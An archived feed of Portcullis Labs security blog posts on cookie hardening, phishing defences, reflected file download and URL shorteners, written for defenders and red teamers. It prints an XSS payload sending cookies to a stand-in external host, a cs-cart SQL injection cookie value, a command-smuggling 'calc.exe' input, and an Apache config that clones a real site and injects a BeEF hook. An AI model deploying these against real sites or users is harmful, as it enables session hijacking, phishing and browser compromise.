Portcullis Labs » phishing – Research and Development
https://labs.portcullis.co.uk

Keep your cookies safe (part 2)
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/
Thu, 15 Feb 2018

In the first blog post we talked about the dangers to which your cookies are exposed. Now it is time to keep your cookies safe: time to learn what protection mechanisms exist, how to use them and why.

How to read this post?

The flowchart below will guide you through the process of checking whether your cookies are well protected. Note that there are other factors and cases that could potentially compromise your cookies (as discussed in part 1 of this blog post).

Of course, the rest of the post explains each step of the flowchart. So if you do not understand something, do not panic! Look for the corresponding question below, where it is explained.

Figure: a flowchart showing how to get your cookies better secured.

Is your session cookie different before and after login?

  • Correct answer: Yes, if your unique session ID cookie is different before and after login, your session is correctly protected against session fixation attacks
  • Incorrect answer: No, your unique session ID cookie is the same; if an attacker managed to steal or fix your cookie before you logged in to the web application, then once you are authenticated the attacker could also access the application

Recommendation: The session ID should be changed when the user logs in.

Are you invalidating the session when the user logs out?

  • Correct answer: Yes, once the user has logged out, the session is destroyed or invalidated
  • Incorrect answer: No, if you do not destroy the session ID server side, the session will remain valid

Recommendation: The session must be invalidated after the user logs out.
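
To make the two session-handling questions above concrete, here is a minimal, framework-agnostic Python sketch; the in-memory store and function names are hypothetical and purely illustrative, not taken from any particular framework:

import secrets

# Hypothetical in-memory session store: session ID -> session data.
sessions = {}

def create_session(data=None):
    # 32 bytes of randomness from the OS CSPRNG.
    sid = secrets.token_urlsafe(32)
    sessions[sid] = data or {}
    return sid

def login(old_sid, username):
    # Rotate the session ID at login so that any ID fixed or stolen before
    # authentication is worthless afterwards (protects against session fixation).
    data = sessions.pop(old_sid, {})
    data["user"] = username
    return create_session(data)

def logout(sid):
    # Invalidate server side: the old ID must stop working immediately,
    # regardless of whether the browser deletes its cookie.
    sessions.pop(sid, None)

A real application would use its framework’s own session handling rather than a dict, but the two operations (rotate at login, destroy at logout) are the same.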

Does your cookie have the attribute “HttpOnly”?

  • Correct answer: Yes, your cookie is only sent over HTTP(S) and is not accessible via JavaScript
  • Incorrect answer: No, your cookie is also accessible via JavaScript, so if an attacker compromises your application with Cross-site Scripting, they could access your cookie

Recommendation: Set the cookie as “HttpOnly”.

Does your cookie have the full domain attribute set?

  • Correct answer: Yes, your cookie is only being sent to the exact domain where it is needed
  • Incorrect answer: No, your cookie may also be sent to any sub-domains you have

Recommendation: The full domain of the cookie must be specified.

Does your cookie have an adequate lifetime?

  • Correct answer: Yes
  • Incorrect answer: No, cookies with an excessive lifetime will not be deleted when the user closes their browser and would therefore be exposed should an attacker manage to compromise the user’s system

Recommendation: Use cookies without a lifetime, so that they are deleted once the user closes their browser, or lower the lifetime to meet business requirements.

Do you have only one web application in the same domain?

What does this question mean? The following is an example of multiple web applications in the same domain:

  • www.mydomain.com/app1
  • www.mydomain.com/app2
  • www.mydomain.com/app3

There is no single correct answer to this question.

If you only have one application running on the domain, you do not need to worry about this issue. However, if you host multiple web applications, you need to set the cookie’s “path” attribute to ensure that the cookie is only sent to the web application it belongs to. The sketch below pulls together the attributes discussed so far.
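
As a rough illustration of the HttpOnly, domain, lifetime and path attributes discussed above, this is how they might be set from a Python web application. Flask is used purely as an example framework here and every name and value is a placeholder:

from flask import Flask, make_response

app = Flask(__name__)

@app.route("/app1/login")
def login():
    resp = make_response("Logged in")
    resp.set_cookie(
        "session_id", "d8a3ae94f81234321",  # placeholder value
        httponly=True,              # not readable from JavaScript
        domain="www.mydomain.com",  # full domain, not ".mydomain.com"
        path="/app1",               # only sent to this application
        # no max_age/expires: a session cookie, removed when the browser closes
    )
    return resp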

Are your cookies NOT storing sensitive information?

  • Correct answer: Yes, my cookies do not contain sensitive information
  • Incorrect answer: No, there is sensitive information in the cookies

Recommendation: Ensure that sensitive information is not stored in the cookies.

Does your web application support HTTPS?

If the answer to this question is NO, you are sending all the data through a plain text protocol. An attacker able to intercept network traffic between a user’s session and the web server could capture the sensitive data being transmitted.

If the answer is YES, there are a few more questions you need to answer before you know whether your cookies are properly protected:

Does your web application use HTTP + HTTPS (mixed content)?

If the answer is NO, it means that HTTP is not allowed and all data is sent over HTTPS. Although your cookie is safe in this case, you need to be careful if you ever enable HTTP.

If the answer is YES you need to answer one more question:

Is HSTS (HTTP Strict Transport Security) enabled, or does the cookie have the “secure” attribute?

If you have HSTS enabled, you are forcing all data (cookies included) to be sent over HTTPS.

If the cookie has the attribute “secure”, you are forcing that cookie to be sent only over HTTPS.

Recommendation: Set the cookie as “secure” and consider enabling HSTS.
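
Continuing the illustrative Flask-based sketch from earlier (again, names and values are placeholders), the “secure” attribute and an HSTS header could be set like this:

from flask import Flask, make_response

app = Flask(__name__)

@app.route("/login")
def login():
    resp = make_response("Logged in")
    # secure=True: the browser will only send this cookie over HTTPS.
    resp.set_cookie("session_id", "d8a3ae94f81234321", secure=True, httponly=True)
    return resp

@app.after_request
def add_hsts(resp):
    # HSTS: instruct the browser to use HTTPS only for the next year,
    # including sub-domains. Only meaningful when the site is served over HTTPS.
    resp.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
    return resp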

A study in scarlet
https://labs.portcullis.co.uk/blog/a-study-in-scarlet/
Thu, 20 Jul 2017

In the modern age, where computers are used for nearly everything we do, the damage that can be caused to a company by cyber-attacks is substantial, with companies losing millions in regulatory fines, compensation and declining share prices. While some of these breaches have been caused by vulnerabilities within the target company’s infrastructure/software, a large number of them began with a phishing attack.

Generally speaking, phishing is a social engineering technique that involves sending fraudulent emails to individuals in an attempt to coerce them into providing confidential information or network access. Spear phishing is a more targeted form of this, where attackers will target specific individuals within an organisation and use information gathered from publicly available resources, such as social media, to make the malicious emails seem more genuine. This attack technique is very effective, with previous research showing victims being up to 4.5 times more likely to believe the contents of targeted emails. Additionally, targeting specific individuals with more access within an organisation, such as managers or system administrators, gives the attacker a greater chance of finding sensitive information than that provided by standard phishing.

The best defence against phishing attacks is to have employees that are aware of the threat and the methods of identifying them. That being said, it’s important to support your employees in this effort, minimising risk and the potential for human error, which is why employers should be doing everything they can to ensure that the emails do not reach their targets and, when they do, that they are easy to identify and report. This can be achieved by looking at the cyber kill chain, as documented by Lockheed Martin, and implementing sensible security controls at each of the stages that relate specifically to a phishing attack.

Delivery

The first part of the cyber kill chain where we can actively identify these attacks is at the delivery stage – when a malicious email hits the external mail server of an organisation. The following security controls can be put in place at this stage of an attack to identify and mitigate the majority of phishing attacks.

Mail content scanning

The most obvious place to search for indicators of a phishing attempt is the content of the emails themselves. By analysing information gathered about common attacks used by malicious actors, it is possible to identify potential phishing attacks before they reach the intended target. The contents of these emails can then be modified to make it easier for users to identify them.

As attackers use phishing as a method of gaining unauthorised access to systems or data, a common attack vector is to include a hyperlink to a web application that they control. Modern mail clients capable of rendering HTML emails make this attack method even more effective, as attackers are able to change the text that is displayed to the user in place of the hyperlink. To help the user identify the threat and limit the risk of this method of attack, hyperlinks should be rewritten to display to the user where their browser will take them if they click on the link.

As phishing attempts will generally come from a network location external to their intended targets, another very simple but effective method of improving a user’s likelihood of identifying a phishing attack is the addition of a warning to the email, stating that it is from an external user. Users seeing that emails have come from an external location are much more likely to exercise caution when following hyperlinks.
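
As a rough sketch of the two controls just described (rewriting hyperlinks to show their real destination and tagging external mail), something along these lines could sit in the mail-processing pipeline. BeautifulSoup is used here for HTML parsing and all names are illustrative assumptions rather than a description of any particular product:

from bs4 import BeautifulSoup  # pip install beautifulsoup4

EXTERNAL_WARNING = "[EXTERNAL] This email originated from outside the organisation.\n\n"

def rewrite_links(html_body):
    # Append the real destination after each link's display text, so that
    # "Click here" becomes "Click here [http://attacker.example/login]".
    soup = BeautifulSoup(html_body, "html.parser")
    for a in soup.find_all("a", href=True):
        a.append(" [" + a["href"] + "]")
    return str(soup)

def tag_external(text_body):
    # Prepend a warning to any mail that arrives from an external address.
    return EXTERNAL_WARNING + text_body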

Attachments

Malicious attachments sent via phishing email are a very real and dangerous threat as, at worst, they could allow an attacker to bypass all external protections and provide them with direct access to a company’s internal network. The most secure method to avoid the risk of this threat would be to block all email attachments coming into a company, however, for the majority of businesses this is not practical and would severely limit their ability to communicate with clients/third-parties. The following security controls can help to mitigate the potential damage that could be caused by malicious attachments:

  • File rewrite – a number of security solutions on the market are able to convert files into a safe format, for example rewriting a Microsoft Word (.docx) file into a PDF so that no macros can be executed
  • Moderator review – one very effective method of mitigating this threat is to hold all emails from external addresses that contain attachments in a quarantine system until they have undergone moderator review, allowing an administrator to examine the contents of the emails and determine whether or not they are malicious
  • Password protected attachments – as security solutions have no feasible way of decrypting password protected files, there is no way of automatically validating whether or not their content is malicious. Because of this, it is important to make sure such attachments are either blocked from entering your organisation or, if there is a business requirement for them, that they at a minimum undergo sandboxing or moderator review

Domain names

A common attack technique used to trick users into providing sensitive information is to use a domain that is close to a company’s legitimate domain. In order to counter this type of attack, security solutions can be employed to review how similar a sending domain is to the company’s legitimate domain, blocking emails from all domains that are above a certain level of similarity.

Another attack technique that has received a lot of attention recently is the use of Internationalised Domain Names (IDNs). IDNs are domain names that contain at least one character outside the normal ASCII character set. In order to facilitate this, such domains are registered as specially formatted ASCII strings preceded by the characters “xn--”; this representation, called Punycode, is what is actually registered with domain providers. Using IDNs, attackers can register domains that look very similar to legitimate sites by swapping ASCII characters for similar-looking Unicode characters (e.g. www.goógle.com could be registered using the Punycode www.xn--gogle-1ta.com). As these IDN domains are actually registered using the Punycode form of the domain name, the threat of this attack technique can be mitigated by blocking all domain labels that begin with the characters “xn--”.
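
A minimal sketch of such a check in Python, treating any Punycode-encoded label (i.e. one that starts with “xn--”) in the sending domain as grounds for blocking:

def contains_punycode(domain):
    # IDNs are registered in their ASCII (Punycode) form, whose labels always
    # start with "xn--" (e.g. goógle.com is registered as xn--gogle-1ta.com).
    return any(label.lower().startswith("xn--")
               for label in domain.split("."))

def should_block_sender(address):
    # Block mail whose sending domain contains any Punycode label.
    domain = address.rsplit("@", 1)[-1]
    return contains_punycode(domain)

# Example: should_block_sender("it-support@xn--gogle-1ta.com") returns True.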

A further way of using a domain to identify malicious activity is to analyse what it appears to be used for. A number of security solutions on the market assign categories to domains, usually based on analysis of the services running on the systems (e.g. the content that is hosted on a web server). Using these solutions, it is also possible to report domains that have been identified as being used in phishing or other malicious activities. As the majority of these solutions operate using a cloud based central server, once a domain has been marked as malicious it will be impractical for attackers to use it in further attacks. Additionally, as attackers are unlikely to want to have their personal details registered to accounts for use in these services, it is likely that they will be unable to have their domains categorised when they set up their phishing. Blocking emails from domains that are not yet categorised can be just as effective at ensuring that phishing attempts do not reach their target.

Email validation

The wide range of open source software available to us makes it simple to set up and use a mail server for a domain of our choosing. This, however, provides attackers with the opportunity to send emails as if they were coming from a legitimate site – name@yourcompanynamehere.com for example. A number of technologies are available that will help to ensure that attackers are not able to spoof emails in this way:

  • Sender Policy Framework (SPF) – SPF is an email validation system which allows domain administrators to define the hosts that are allowed to send emails for their domain, through the use of a specially formatted DNS TXT record:
Figure: an example SPF record entry.

  • Domain Keys Identified Mail (DKIM) – DKIM also uses a specially formatted DNS TXT record to validate the sender of an email, through the use of public/private key cryptography. The sending mail server adds a digital signature to outgoing emails, which can be verified using a public key that is published within the DNS record. This email validation method also provides data integrity for the emails, as any alterations made in transit will affect the validation of the digital signature.
Figure: an example DKIM signature in an email header.

  • Domain-based Message Authentication, Reporting and Conformance (DMARC) – DMARC takes the two validation systems described above and builds on them to create a much more robust system. It allows domain administrators to define which validation systems mail servers should use for the domain (SPF, DKIM or both) and how receiving mail servers should handle emails that do not pass the validation process.

By utilising these security controls and ensuring that our receiving mail server is checking the DNS records against the information in emails, we are able to ensure that attackers are unable to spoof emails from legitimate domains.
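
Since the original figures are not reproduced above, the following illustrative records give a feel for what each mechanism looks like in DNS; the domain, selector and key material are placeholders, not real values:

; SPF: only the listed hosts may send mail for example.com
example.com.                  IN TXT "v=spf1 mx ip4:198.51.100.10 include:_spf.example.net -all"

; DKIM: the public key is published under a selector and used to verify signatures
mail._domainkey.example.com.  IN TXT "v=DKIM1; k=rsa; p=MIIBIjANBgkq...truncated..."

; DMARC: tell receivers to reject mail that fails SPF/DKIM alignment and where to send reports
_dmarc.example.com.           IN TXT "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"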

Malicious email reporting

If a malicious email does manage to get through all of the security controls at the perimeter, it is likely that at least some of its intended targets will fall for the scam. With that in mind, it is important that users have a way of notifying the people responsible for the security of your organisation that a malicious email has slipped through the net. Multiple solutions for this are available, such as a plugin for the company mail client or a mailing list used to report malicious emails. In tandem with this, policies and procedures should be put in place that detail the process administrators and security staff should follow to inform employees that a phishing attack is underway and how to identify it.

Figure: mail client plugin.

Exploitation, installation and command & control

A number of security controls can be used to mitigate the threat of phishing attacks across the next 3 stages of the cyber kill chain – Exploitation, Installation and Command & Control. If an attack has managed to progress this far along the cyber kill chain it is imperative that it is identified and stopped to ensure that the attacker is not able to gain a foothold on an internal network.

End point protection

The most obvious method of blocking malicious applications from running on a target user’s system is to install an End Point Protection application. There are a number of options for this on the market, each of them able to detect and protect against millions of variants of malware and other unwanted applications. These products can help to stop an attack at either the Exploitation or Installation stages of the cyber kill chain by identifying and blocking malicious files/activity.

Outbound proxies

A common method of attack used in phishing attempts is to provide a link within the email that, when followed, will display a page asking for credentials or other sensitive information. In order to stop attackers using this technique, a network proxy can be used to block traffic to unknown domains. One possible solution to this issue is to only allow access to the top ranked sites, however, for some organisations this may not be practical. In situations such as this, a moderator/administrator should review any unknown domains to ensure that they are not malicious.

In addition to mitigating the threat of users disclosing sensitive information, these solutions can help to break the cyber kill chain at the installation and command & control (C2) stages, by stopping malware from using HTTP connections to unknown domains to download Remote Access Tools (RATs) or as a C2 channel.

Sandboxing

Sandboxing is the practice of using a system that is not connected to the live network (usually a virtual machine) to test files for malicious activity. As most attachments used in phishing attacks will have similar behaviour (e.g. connecting back to a command & control node) after being opened, sandboxing can be used to identify them within a safe environment to ensure that no live systems are affected. By using sandboxing technologies we can analyse the behaviour of files against indicators of malicious activity at all three of the stages of the kill chain.

Threat intelligence

While having all of the security solutions described above can help to identify and mitigate the threat of phishing attacks, the individuals behind the attacks are always developing and adapting their methodologies. Taking this into account, it is of utmost importance that the indicators of attack that we are looking for evolve with them. By feeding any information gathered from previous attacks into cloud-based threat intelligence platforms, the security community’s understanding of how attackers are operating will grow, which will in turn improve our ability to stop them.

Summary

While the threat of phishing attacks and the damage they can do is significant, both financially and to a company’s reputation, by looking at the timeline of these attacks it is possible to identify many security controls that can be used to mitigate them. By utilising these controls, through a defence-in-depth approach to security, we are able to limit the number of malicious emails that reach their targeted users. Furthermore, by using information about recognised indicators of attack, we are able to alter the contents of emails to assist users in the identification of emails and content that could potentially cause a security breach.

Keep your cookies safe (part 1)
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/
Fri, 22 Apr 2016

What are cookies and why are they important?

A cookie is a small piece of data sent from a web site and stored in a user’s web browser, which is subsequently included with all requests that belong to that session. Some cookies contain the user’s session data for a web site, which is vital. Other cookies are used to keep long-term records of an individual’s browsing history and preferences, such as their preferred language. Sometimes they are also used for tracking and monitoring a user’s activities across different web sites.

Because HTTP is a stateless protocol, the web site needs a way to authenticate the user on each request. Every time the user visits a new page within a web site, the browser sends the user’s cookie back to the server, allowing the server to serve the correct data to that individual user, who is tracked using a session ID. Cookies therefore play an integral part in ensuring persistence of data across the multiple HTTP requests made throughout the time a user visits a web site.

What does a cookie look like?

Set-Cookie: __cfduid=d8a3ae94f81234321; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.domain.com; HttpOnly

The cookie above is an example of a common cookie generated for WordPress. Here we break down each part of the cookie and explain what it is used for:

  • Set-Cookie – the web server asks the browser to save the cookie with this command
  • __cfduid=d8a3ae94f81234321; – this is the cookie itself: to the left of the equals sign is the name of the cookie and to the right is its value
  • expires=Mon, 23-Dec-2019 23:50:00 GMT; – this is the date and time at which the cookie will expire
  • path=/; domain=.domain.com; – the cookie domain and path define the scope of the cookie. They tell the browser that the cookie should only be sent back to the server for the given domain and path
  • HttpOnly – this attribute (which has no associated value) tells the browser that JavaScript cannot be used to access the cookie, which must only be accessed over HTTP or HTTPS. Sometimes you will also see the attribute “Secure”, which prevents the cookie being sent over the unencrypted HTTP protocol (i.e. the cookie will only be transmitted over HTTPS)

What is the impact of having your cookies compromised?

A traditional and important role of a cookie is to store a user’s session ID, which is used to identify the user. If this type of cookie is stolen by a malicious user, they would be able to access the web site as the user to whom the cookie belonged (i.e. the malicious user would have access to your account within the web site).

In the case of the tracking cookie, the malicious user would have access to your browsing history for the web site.

Another problem arises when sensitive data, for example a username, is stored in cookies. Cookies are also a vector for server side exploitation if their contents are not properly validated, which can potentially lead to serious vulnerabilities such as SQL injection or remote code execution.

What are the main cookie threats?

Figure: Cookie Monster.

There are different attack vectors through which cookies can be obtained or modified, leading to the hijacking of an authenticated user’s session, or even SQL injection attacks against the server. These threats may arise when an attacker takes control of the web browser using Cross-site Scripting or spyware in order to obtain a user’s session ID cookie, which can then be used by the attacker to impersonate the legitimate user, as shown in the following example:

Obtaining access to the cookie can be as easy as using the following JavaScript line:

document.cookie

Imagine that the web site has a search form that is vulnerable to Cross-site Scripting (reflected Cross-site Scripting in this case):


http://myweb.com/form.php?search=XSS_PAYLOAD_HERE

An attacker could use the following payload to send the cookie to an external web site:

<script>location.href='http://external_website.com/cookiemonster.php?c00kie='+escape(document.cookie);</script>

The final step would be to send the vulnerable link to an admin and wait for them to click on it. If the attacker uses a URL shortener, this allows for further obfuscation of the malicious URL, as the admin will be unable to see the real destination of the link they have been sent.

An attacker able to read a given user’s files may also attempt to retrieve the cookies stored on the file system. Furthermore, some browsers store persistent cookies in a binary file that is easily readable with existing public tools.

Security weaknesses may also reside server side when cookies are modified, if input validation routines are not adequately implemented. The example below (a real cs-cart vulnerability) shows how the authentication process could be bypassed:

//In /core/user.php: (cs cart vulnerability)

if (fn_get_cookie(AREA_NAME . '_user_id')) {
 $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status, membership_id FROM $db_tables[users]
 WHERE user_id='".fn_get_cookies(AREA_NAME . '_user_id')."' AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
 fn_define('LOGGED_VIA_COOKIE', true);

}

//Cookie: cs_cookies[customer_user_id]=1'/*;
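
By way of contrast, here is a hedged sketch of what adequate handling of a cookie-derived value might look like, using Python and a parameterised query; the table layout and cookie names below are illustrative and are not taken from cs-cart:

import sqlite3

def get_user(conn, user_id_cookie, password_cookie):
    # Reject anything that is not a plain integer before it gets anywhere
    # near the database.
    if not user_id_cookie.isdigit():
        return None
    # Parameterised query: the driver handles quoting, so a value such as
    # "1'/*" cannot change the structure of the SQL statement.
    cur = conn.execute(
        "SELECT user_id, user_type FROM users WHERE user_id = ? AND password = ?",
        (int(user_id_cookie), password_cookie),
    )
    return cur.fetchone()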

Because of the role they play, cookies are really important and can be abused in many different attacks.

Now that you are more aware of the dangers, it would be wise to ensure steps are taken to deploy web site cookies safely and securely. Look out for the second part of this post!

Blood in the water: Phishing with BeEF
https://labs.portcullis.co.uk/blog/blood-in-the-water-phishing-with-beef/
Fri, 18 Sep 2015

Those of you that have been following the UK infosec market recently will have noticed an upturn in talk relating to “Red Team” style engagements. Unlike a traditional penetration test, the object of such an exercise is not to locate vulnerabilities (though of course that helps) but rather to exercise the “Blue Team” i.e. the internal users at an organisation responsible for defending their network. This change has been driven by CBEST and the associated STAR exam offerings from CREST, which have certainly raised the bar. Whilst most IT security consultancies are happy to talk about phishing, the level to which they go to mimic the target can vary.

Historically, the Portcullis offering has, whilst bespoke, been more about gathering statistics on how many victims clicked a given link than much else. With this in mind, over the last 12 months, I’ve set about developing our service in a more aggressive direction. One particular idea I’ve wanted to deliver for a while is to integrate BeEF into our offering. As an aside, for those of you that don’t know of BeEF, it allows you to hook web site visitors and turn them into drones. This allows for longer-term exploitation of their browsers, including fingerprinting and even RCE giving OS-level access to their PCs.

As I’ve already stated, Portcullis offer a bespoke phishing service where we tailor the web site and email to the particulars of our client. For a start, we will perform reconnaissance to locate a suitable legitimate web site to mimic, and secondly we will work with our client to ensure that our emails aren’t caught by any anti-phishing technology they may be using (often the first point of failure when phishing a mature organisation). Typically, we will then mimic our chosen site on a similar looking domain before sending emails to our victims. Historically, we’ve statically cloned the legitimate site (or at least the portions we need) before tweaking it to add our hooks; however, on a recent project, I took the opportunity to improve this. The reasons for the change were many and varied but essentially came down to the fact that a statically cloned site will never look as good as the real thing, notably with respect to the functionality a victim might expect to see, but also because the tweaks we then have to make are quite time consuming. The aims of my improvements were therefore two-fold:

  • Allow dynamic web sites to be cloned
  • Integrate BeEF

Whilst I’ve previously looked, I’ve not found any information elsewhere that discusses how to do this in detail, so I decided to use the Apache web server, mod_proxy and mod_substitute (tools I’m already familiar with). The remainder of this post discusses the approach I took.

Consider the following configuration:

<VirtualHost *:80>
        ServerName HOSTNAME.DOMAINNAME
        DocumentRoot /var/www/HOSTNAME.DOMAINNAME
        ...
        ProxyPass /pcslhook.js !
        ProxyPass /pcslendpoint.php !
        ProxyPass /hook.js http://localhost:3000/hook.js
        ProxyPassReverse /hook.js http://localhost:3000/hook.js
        ProxyPass /dh http://localhost:3000/dh
        ProxyPassReverse /dh http://localhost:3000/dh
        ProxyPass /ui http://localhost:3000/ui
        ProxyPassReverse /ui http://localhost:3000/ui
        ProxyPass / http://PLEASECOMPLETEME/
        ProxyPassReverse / http://PLEASECOMPLETEME/
        AddOutputFilterByType INFLATE;SUBSTITUTE;DEFLATE text/html
        AddOutputFilterByType INFLATE;SUBSTITUTE;DEFLATE text/javascript
        Substitute "s#<head>#<head><script type=\"text/javascript\" src=\"/pcslhook.js\"></script><script type=\"text/javascript\">load();</script><script type=\"text/javascript\" src=\"/hook.js\"></script>#ni"
        Substitute "s#:3000##ni"
        Substitute "s#\"3000\"#\"80\"#ni"
        Substitute "s#@PLEASECOMPLETEME#@PLEASECOMPLETEME#ni"
</VirtualHost>

We start off by defining the ServerName, near the top of the configuration. This will typically be based on the domain name that we control, e.g. if the organisation we are targeting is example.org, we might register example.com. We then configure the real web site with the ProxyPass / and ProxyPassReverse / directives. Any request for example.com will therefore be rewritten and proxied by our web server instance to example.org. This means, for example, that if a victim performs a search on our web site, then requests for http://example.com/search?query=test will be relayed to http://example.org/search?query=test and the victim will get identical results to those they would have received on the legitimate web site. Finally, we inject BeEF with the first Substitute directive. I’ve found that the best approach is to pick a unique snippet of HTML (one that appears only once in each page) and use this as the anchor for my substitution.

Whilst this forms the basis of our subterfuge, what of the other lines in our example configuration?

  • We use ProxyPass … ! when we want to process requests from our own web root (/var/www/HOSTNAME.DOMAINNAME)
  • We use ProxyPass … http://localhost:3000/… to proxy requests through to BeEF
  • We apply an output filter on all HTML and JavaScript returned by the real web site to allow for the substitutions
  • We substitute out 3000 towards the end, as from an external perspective BeEF is on the same port as everything else
  • We substitute out the legitimate domain in any email addresses the real web site may return

It should be noted, that a similar approach can be taken to pass requests through to Metasploit and other exploitation frameworks.

This concludes our brief example. If you enjoyed it, feel free to borrow and if you think you or your users might be susceptible, please feel free to give us a call.

PS /pcslhook.js and /pcslendpoint.php are our secret sauce, not that we ever call them that.
PPS You should probably use Location “/ui” to limit who can access the BeEF administration panel.
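
For the PPS above, a minimal example of what that restriction might look like (Apache 2.4 syntax; the address range is a placeholder and should be whatever your operators actually use):

<Location "/ui">
    # Only the red team's own address range may reach the BeEF administration panel.
    Require ip 203.0.113.0/24
</Location>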

You can’t even trust your own reflection these days…
https://labs.portcullis.co.uk/blog/you-cant-even-trust-your-own-reflection-these-days/
Wed, 05 Nov 2014

Recently, researchers at Trustwave’s SpiderLabs spoke at Black Hat Europe on the dangers of simply reflecting data back to the requesting user as part of an HTTP request/response exchange. When you think about it, this stands to reason, after all, it’s what Cross-site Scripting attacks are born from. What’s interesting is that the new research discussed another way in which it could be exploited.

The basic premise of the attack (as described in SpiderLabs’ Reflected File Download whitepaper) is as follows:

  1. The user follows a malicious link to a trusted web site
  2. An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was hosted on the trusted web site
  3. The user executes the file which contains shell commands that gain complete control over the computer

So how does it work? On a recent engagement, one of our consultants found a similar issue. In their case, it was a stored variant of the issue SpiderLabs describe but in other regards, it was identical. The consultant discovered that the application they were testing used two APIs that allowed for the storage and retrieval of data, like so:

POST /putData HTTP/1.0
...
{"id":12345, "input":"asdf||calc.exe||pause"}

This data could then be retrieved using the following URL:

  • http://URL/getData/12345;1.bat

Requesting this in a browser results in the browser believing that the user has downloaded what appears to be a batch file called 12345;1.bat. If the user executes this file, then calc.exe (part of our original input) will be executed.

As with other similar attacks, which exploit variances in how user controlled data is treated by different components of a solution (in this case, the browser and the server), once you know what to watch out for, it’s fairly easy to mitigate.

Specifically:

  • Validate all user input
  • Sanitise by means of context sensitive encoding/escaping any user input that remains
  • Avoid wildcard mappings such as /getdata/* on exposed web services
  • Ensure that you’re correctly setting the important HTTP headers such as Content-Type and Content-Disposition (and other related headers such as X-Content-Type-Options) so that direct requests for the URL cause the file to be downloaded

This last point is particularly important: browsers will often attempt to automatically render downloaded content using whatever application is registered for the target file type. Sending a Content-Disposition header of:

attachment; filename=1.txt

precludes this, as no matter whether it is saved or opened, it will be treated as text, a relatively safe file type.
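
As a rough illustration of that last mitigation, here is how the headers might be set from a Python web application; Flask is used purely as an example and the route mirrors the one described above rather than the application that was actually tested:

from flask import Flask, jsonify

app = Flask(__name__)

@app.route("/getData/<data_id>")
def get_data(data_id):
    resp = jsonify({"id": data_id, "input": "..."})
    # Force a download with a fixed, safe name and extension...
    resp.headers["Content-Disposition"] = "attachment; filename=1.txt"
    # ...and stop browsers from second-guessing the declared content type.
    resp.headers["X-Content-Type-Options"] = "nosniff"
    return resp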

All in all, a nice catch and one we’ll definitely use in our red team engagements.

URL shorteners: What link are you really clicking?
https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/
Wed, 08 Jan 2014

URL shorteners are a main-stay of Internet use these days, helping users to cut down unsightly long URLs to concise links that can be easily shared. Social media has helped to fuel the popularity of the various services available, but how do you know if you can trust the link you’re clicking? I’ve always been wary of shortened links and decided I’d take a look at how you can check what it is you’re actually clicking on.

It’s worth noting that there are numerous browser extensions that will attempt to lengthen short URLs in-situ. While this probably works well most of the time, it could be open to exploitation (if the extension is coded badly) or subversion. One piece of functionality I’ve seen in such an extension was to replace the link with the page’s meta data title. This doesn’t really help if the link leads you to a convincing looking phishing site, complete with fake meta data.

I’ve picked out a sample of what seem to be the most popular shortening services. They are (in no particular order):

  • bit.ly
  • tinyurl.com
  • goo.gl
  • is.gd
  • tiny.cc
  • ow.ly

I’ve come up with this list as a result of a quick search and previous experience. There are a couple of notable exclusions, such as t.co and fb.me, the services run by Twitter and Facebook respectively. I’ve excluded these (as well as others) because they’re only used by the services themselves.

Twitter’s shortener, t.co, seems to be accessible only when using Twitter and doesn’t provide any kind of dedicated front-end to view information for a given link. It does, however, replace some of the text in-line and provides the original URL in the link title, which you can see by hovering over the URL.
Facebook’s version seems a little… undocumented. I couldn’t find a great deal of information on it, other than that it seems to be used largely for mobile users and (from what little I checked) is only used for linking back to Facebook. One feature I did find, however, is that it can be used to link to any Facebook page given its alias. For example, fb.me/PortcullisCSL.

I’ve also only chosen services which are free to use and for obvious reasons I’m excluding any that you can create using your own domain (Coke has one for example – cokeurl.com).

For this post, we’re going to use https://labs.portcullis.co.uk as our long URL to put through the shorteners.

Here’s a list of how our shortened links come out and the associated ways of previewing the actual destination:

Service Short link Preview link
bit.ly http://bit.ly/2cx5kA http://bit.ly/2cx5kA+
tinyurl.com http://tinyurl.com/nt79ln4 http://preview.tinyurl.com/nt79ln4
goo.gl http://goo.gl/cgc0Wb http://goo.gl/#analytics/goo.gl/cgc0Wb/all_time
is.gd http://is.gd/ObGfiX http://is.gd/ObGfiX-
tiny.cc http://tiny.cc/43z67w http://tiny.cc/43z67w~
ow.ly http://ow.ly/rObWZ Couldn’t find a way to expand the URL.

In summary: bit.ly, is.gd and tiny.cc all have nice simple ways of taking a look; you just have to add a character onto the end (providing you pick the right one). Google’s service seems the most complicated, requiring knowledge of the correct runes, and I couldn’t find a way to preview ow.ly at all.

When writing this post, I was pointed at a bit of quick Perl that Tim wrote a little while ago to assist in a test which will follow a short link and print out each redirect it encounters along the way. This is particularly useful if your chosen link leads you to yet another URL shortener service.

#!/usr/bin/perl

use strict;
use warnings;
use LWP;
use File::Basename;

my $url;
my $redirectflag;
my $httphandle;
my $requesthandle;
my $responsehandle;

sub usage {
        die "usage: " . basename($0) . " <url>\n";
}

if (@ARGV != 1) {
        usage();
}
$url = shift;
$httphandle = LWP::UserAgent->new(max_redirect => 0);
$httphandle->agent("Mozilla/5.0 (compatible; resolveurl.pl 0.1)");
$redirectflag = 1;
# Follow each redirect manually, printing every Location header along the way.
while ($redirectflag == 1) {
        $redirectflag = 0;
        $requesthandle = HTTP::Request->new(HEAD => $url);
        $responsehandle = $httphandle->request($requesthandle);
        if ($responsehandle->is_redirect) {
                $url = $responsehandle->header("location");
                print $url . "\n";
                $redirectflag = 1;
        }
}

Lastly, I’ve decided to make a quick mention of adf.ly, which was pointed out to me by a colleague. This is a service that presents ads before sending users on to the end URL. From a quick look, there didn’t appear to be any way to preview the URL you were being sent to. Given that following one of their links will present you with a third party ad, this could have its own implications. But that’s for another post.
